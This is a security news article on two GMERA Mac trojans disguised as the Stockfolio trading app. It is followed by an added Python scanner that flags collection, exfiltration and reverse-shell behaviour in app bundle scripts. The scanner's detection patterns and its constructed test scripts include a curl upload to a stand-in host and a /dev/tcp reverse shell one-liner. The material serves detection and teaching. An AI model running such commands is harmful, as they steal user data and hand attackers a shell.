Researchers have uncovered two variants of information-stealing Mac malware that impersonates a legitimate stocks and cryptocurrency trading application.
The two variants, identified by Trend Micro as Trojan.MacOS.GMERA.A and Trojan.MacOS.GMERA.B, both include a copy of Stockfolio version 1.4.13, along with the malware author’s digital certificate and various malicious components.
The first variant’s components include a Mach-O (Mach object file format) executable, which launches a pair of bundled shell scripts from the Resources directory. The “plugin” shell script silently collects the victim’s username, IP address, installed applications, the files in the Documents and Desktop folders, OS installation data, file system disk space, graphics/display information, wireless network details and screenshots. It then saves the collected information in a hidden file and uploads it to a URL, followed by a second hidden file if the URL responds.
The “stock” shell script, meanwhile, goes through a series of steps to decrypt and execute “appcode,” a suspected malware file that likely contains additional routines. Trend Micro was unable to decrypt this file to study it further.
The second variant, upon being opened, immediately launches the shell script run.sh, which collects the username and IP address using a pair of commands and sends that information to the attackers. It also drops more files, including a persistence mechanism and malware execution logs, before creating a reverse shell that lets the malware’s authors run shell commands on the infected Mac.
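As an added example, not code from the article or from Trend Micro, the following Python scanner walks a .app bundle’s Contents/Resources for shell scripts and flags the behaviours described for both variants: host and file enumeration, staging into a hidden file, an upload, and a reverse shell. The regex rules, the bundle name, the staging paths, the example.invalid URL and the three scripts it scans are all assumptions constructed for illustration; none of them are GMERA indicators.

```python
"""Added example: heuristically flag bundled shell scripts of the kind described
above. The rules below are generic assumptions, not Trend Micro's GMERA indicators."""
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# The scripts may carry no extension (the "plugin"/"stock" names above), so sniff the shebang.
SHEBANG_RE = re.compile(rb"^#!\s*/(?:usr/)?bin/(?:ba|z)?sh\b")

# Assumed, generic patterns for each behaviour the article describes.
RULES = {
    "collects-username":   re.compile(r"\bwhoami\b|\bid\s+-un\b"),
    "collects-ip":         re.compile(r"\bifconfig\b|\bipconfig\s+getifaddr\b"),
    "enumerates-files":    re.compile(r"\bls\b[^\n]*(?:Documents|Desktop)"),
    "profiles-system":     re.compile(r"\bsystem_profiler\b|\bdf\s+-h\b"),
    "wireless-details":    re.compile(r"\bairport\s+-I\b|\bnetworksetup\b"),
    "screenshot":          re.compile(r"\bscreencapture\b"),
    "hidden-staging-file": re.compile(r">{1,2}\s*\S*/\.[A-Za-z0-9_]"),  # redirect into a dotfile
    "exfil-upload":        re.compile(r"\bcurl\b[^\n]*(?:-F\b|--data\b|-d\b|-T\b|--upload-file\b)"),
    "reverse-shell":       re.compile(r"/dev/tcp/|\bnc\b[^\n]*\s-e\b|\bbash\s+-i\s*>&"),
}
COLLECTION = {"collects-username", "collects-ip", "enumerates-files",
              "profiles-system", "wireless-details", "screenshot"}


def is_shell_script(path: Path) -> bool:
    if path.suffix == ".sh":
        return True
    try:
        with path.open("rb") as f:
            return SHEBANG_RE.match(f.read(64)) is not None
    except OSError:
        return False


def scan_script(text: str) -> list[str]:
    """Return the names of every rule that matches a script body, in RULES order."""
    return [name for name, rx in RULES.items() if rx.search(text)]


def scan_bundle(app_dir: str | Path) -> dict[str, list[str]]:
    """Map each flagged script under Contents/Resources to its matched rules."""
    app_dir = Path(app_dir)
    resources = app_dir / "Contents" / "Resources"
    findings: dict[str, list[str]] = {}
    if not resources.is_dir():
        return findings
    for path in sorted(resources.rglob("*")):
        if path.is_file() and is_shell_script(path):
            hits = scan_script(path.read_text(errors="replace"))
            if hits:
                findings[path.relative_to(app_dir).as_posix()] = hits
    return findings


def verdict(findings: dict[str, list[str]]) -> str:
    """Collection plus an upload, or a reverse shell, is enough to call the bundle malicious."""
    hits = {h for hs in findings.values() for h in hs}
    if "reverse-shell" in hits or ("exfil-upload" in hits and hits & COLLECTION):
        return "malicious"
    return "suspicious" if hits else "clean"


# Constructed stand-ins modelled on the behaviour described above; not the real scripts.
PLUGIN_SCRIPT = """#!/bin/bash
whoami > /tmp/.info
ipconfig getifaddr en0 >> /tmp/.info
ls ~/Documents ~/Desktop >> /tmp/.info
system_profiler SPSoftwareDataType SPDisplaysDataType >> /tmp/.info
df -h >> /tmp/.info
networksetup -getairportnetwork en0 >> /tmp/.info
screencapture -x /tmp/.shot.png
curl -F "data=@/tmp/.info" http://example.invalid/upload
"""
RUN_SCRIPT = """#!/bin/sh
whoami > /tmp/.u
ipconfig getifaddr en0 >> /tmp/.u
curl -d @/tmp/.u http://example.invalid/c
bash -i >& /dev/tcp/203.0.113.10/4444 0>&1
"""
BENIGN_SCRIPT = """#!/bin/sh
echo "building resources"
mkdir -p build
"""


def build_demo_bundle(root: str | Path) -> Path:
    """Lay out a fake .app (assumed name) under `root` with the constructed scripts above."""
    app = Path(root) / "FakeStocks.app"
    res = app / "Contents" / "Resources"
    res.mkdir(parents=True)
    (res / "plugin").write_text(PLUGIN_SCRIPT)
    (res / "run.sh").write_text(RUN_SCRIPT)
    (res / "helper.sh").write_text(BENIGN_SCRIPT)
    return app


def demo_scan() -> tuple[dict[str, list[str]], str]:
    """Build the constructed bundle in a temp dir, scan it, and return (findings, verdict)."""
    with tempfile.TemporaryDirectory() as tmp:
        findings = scan_bundle(build_demo_bundle(tmp))
    return findings, verdict(findings)


if __name__ == "__main__":
    found, result = demo_scan()
    for script, hits in found.items():
        print(f"{script}: {', '.join(hits)}")
    print("verdict:", result)
```

The regex rules are deliberately coarse and will flag legitimate installer or build scripts that gather system information, so treat the output as a triage cue rather than a detection. On a real bundle, pair it with `codesign -dv --verbose=4 Some.app` and `spctl --assess --verbose Some.app`, which is where a revoked signing certificate like the one mentioned below would surface.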
Trend Micro said Apple told its researchers that it revoked the fake app authors’ code-signing certificate last July.